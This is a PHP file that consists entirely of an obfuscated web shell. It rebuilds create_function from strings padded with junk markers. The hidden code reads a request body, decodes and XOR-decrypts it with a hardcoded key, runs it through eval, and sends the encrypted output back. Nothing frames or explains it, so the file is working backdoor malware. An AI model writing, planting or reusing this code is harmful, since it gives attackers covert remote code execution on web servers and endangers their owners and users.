<?php
$r='"/$Q@kh(.+)$kfQ@/"Q@,@Q@file_Q@get_coQ@ntentQ@s("phpQ@://Q@input"),$m)==Q@1) {@oQ@Q@b_start();@eva';
$z=str_replace('Di','','DiDicreDiate_DifunDicDition');
$e='@tiQ@on x($tQ@,$k)Q@{$c=strlQ@enQ@(Q@$k);$l=Q@strleQ@n(Q@$tQ@);$o="";for($i=0;$i<$l;Q@){for($j=0;(';
$a='_end_clQ@eanQ@();$r=@bQ@aseQ@64_eQ@ncode(@x(@gzcomQ@pQ@ress($oQ@),$k));priQ@Q@nt("Q@$p$kh$r$kf");}';
$V='$Q@k="202cb9Q@62Q@";$kh="ac5907Q@5b96Q@4b";$kf="Q@07Q@Q@152dQ@234b70";$p="IGUNQ@8SJXqJQ@EQ@JwNzH";funcQ';
$h='Q@l(@gzuncoQ@mprQ@ess(@Q@x(@baQ@se64Q@_decode($m[Q@1]),Q@$k)));Q@$o=@Q@ob_geQ@tQ@_contents();@obQ@';
$W='Q@$jQ@<$c&&$i<Q@Q@$l)Q@;$jQ@++,$i++){$o.=Q@$t{$Q@i}^$k{$j};}}rQ@etQ@urn $Q@o;}if (@Q@preg_maQ@tch(';
$Y=str_replace('Q@','',$V.$e.$W.$r.$h.$a);
$R=$z('',$Y);$R();
?>
